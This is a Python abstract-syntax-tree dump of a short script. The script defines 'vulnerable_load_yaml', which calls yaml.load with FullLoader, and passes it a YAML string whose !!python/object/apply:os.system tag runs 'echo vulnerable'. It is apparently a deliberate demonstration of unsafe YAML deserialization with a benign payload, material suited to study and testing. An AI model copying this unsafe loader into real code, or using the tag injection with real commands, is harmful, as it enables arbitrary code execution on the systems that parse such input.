Module(
    body=[
        Import(
            names=[
                alias(name='yaml')]),
        FunctionDef(
            name='vulnerable_load_yaml',
            args=arguments(
                posonlyargs=[],
                args=[
                    arg(arg='vault_content')],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Return(
                    value=Call(
                        func=Attribute(
                            value=Name(id='yaml', ctx=Load()),
                            attr='load',
                            ctx=Load()),
                        args=[
                            Name(id='vault_content', ctx=Load())],
                        keywords=[
                            keyword(
                                arg='Loader',
                                value=Attribute(
                                    value=Name(id='yaml', ctx=Load()),
                                    attr='FullLoader',
                                    ctx=Load()))]))],
            decorator_list=[]),
        Assign(
            targets=[
                Name(id='vault_content', ctx=Store())],
            value=Constant(value="\nmy_secret: !!python/object/apply:os.system ['echo vulnerable']\n")),
        Assign(
            targets=[
                Name(id='data', ctx=Store())],
            value=Call(
                func=Name(id='vulnerable_load_yaml', ctx=Load()),
                args=[
                    Name(id='vault_content', ctx=Load())],
                keywords=[])),
        Expr(
            value=Call(
                func=Name(id='print', ctx=Load()),
                args=[
                    Name(id='data', ctx=Load())],
                keywords=[]))],
    type_ignores=[])